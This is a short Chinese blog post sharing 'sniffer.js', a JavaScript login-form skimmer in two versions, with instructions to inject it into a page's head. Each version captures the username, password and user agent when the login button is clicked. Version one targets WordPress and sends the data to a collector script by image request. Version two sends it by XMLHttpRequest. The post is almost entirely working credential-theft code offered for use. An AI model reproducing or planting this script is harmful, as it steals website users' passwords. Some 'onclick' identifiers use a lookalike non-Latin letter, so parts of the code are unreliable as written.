version 1.0 需要代码添加到登陆表单的后面,才可以正常使用。
经完善后(这里有两种方法),可以添加在任何位置,比如<head> 标签里,而不必添加在登录表单的后面。
sniffer.js 方法一
/*
author: eT48
blog: http://blog.csdn.net/et48_sec
version: v1.5
*/
document.onreadystatechange = function()
{
var http_server = "http://localhost:8081/sniffer.php";
document.getElementById("wp-submit").οnclick=function(){sniffer()};
function sniffer()
{
var user = document.getElementById("user_login").value;
var pwd = document.getElementById("user_pass").value;
var ua = navigator.userAgent;
var x = new Image();
x.src = http_server+"?user="+user+"&pwd="+pwd+"&ua="+ua;
}
}
sniffer.js 方法二
/*
author: eT48
blog: http://blog.csdn.net/et48_sec
verson: 2.0
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
document.οnclick=function post(e){
var targ;
if (!e) var e = window.event;
if (e.target) targ = e.target;
else if (e.srcElement) targ = e.srcElement;
if (targ.nodeType == 3) // defeat Safari bug
targ = targ.parentNode;
var tname;
tname=targ.id;
if(tname=="Login")
{
var user = document.getElementById("username").value;
var pwd = document.getElementById("password").value;
var ua = navigator.userAgent;
var url = "shenlan.php?user="+user+"&pwd="+pwd+"&ua="+ua;
xmlhttp.open("GET",url,true);
xmlhttp.send();
}
}